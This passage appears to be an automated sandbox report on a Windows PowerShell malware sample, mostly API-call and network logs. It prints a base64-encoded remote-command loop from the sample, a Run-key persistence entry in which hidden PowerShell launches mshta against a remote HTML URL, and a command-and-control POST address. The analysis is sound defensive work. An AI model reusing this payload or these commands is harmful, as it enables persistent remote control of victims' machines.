ABCAG8AOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwB0AGEAcwBrADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABlAGwAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AfQB9AH0AIABDAGEAdABjAGgAewB9AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADcAOwB9AHcAaABpAGwAZQAoACQAdAByAHUAZQAgAC0AZQBxACAAJAB0AHIAdQBlACkA
  2200

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.93.181.249	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 1, 2023, 7:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 1, 2023, 7:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 1, 2023, 7:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 1, 2023, 7:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 1, 2023, 7:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 1, 2023, 7:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 1, 2023, 7:54 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 1, 2023, 7:53 p.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M console_handle: 0x0000001f	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: icrosoft\Windows\CurrentVersion\Run console_handle: 0x00000023	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M console_handle: 0x00000027	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: icrosoft\Windows\CurrentVersion console_handle: 0x0000002b	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: PSChildName : Run console_handle: 0x0000002f	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: PSDrive : HKCU console_handle: 0x00000033	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x00000037	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: JQQwE : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidde console_handle: 0x0000003b	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: n -NoLogo -NonInteractive -ep bypass ping -n 1 -w 474465 2.2.2.2 console_handle: 0x0000003f	1	1
WriteConsoleW June 1, 2023, 7:54 p.m.	buffer: \|\| mshta http://172.93.181.249/control/html/1.html console_handle: 0x00000043	1	1

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bba70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb7b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 1, 2023, 7:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003baff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 1, 2023, 7:53 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header, Connection to IP address

suspicious_request

POST http://172.93.181.249/control/com.php?U=TEST22-PC-test22

Performs some HTTP requests (1 event)

request

POST http://172.93.181.249/control/com.php?U=TEST22-PC-test22

Sends data using the HTTP POST Method (1 event)

request

POST http://172.93.181.249/control/com.php?U=TEST22-PC-test22

Allocates read-write-execute memory (usually to unpack itself) (50 out of 154 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73162000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c73000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03bd0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d61000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02961000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02962000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0232a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0233b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02337000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02322000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02335000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0232c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0233c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02323000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02324000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02325000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02326000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02327000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02328000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02329000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
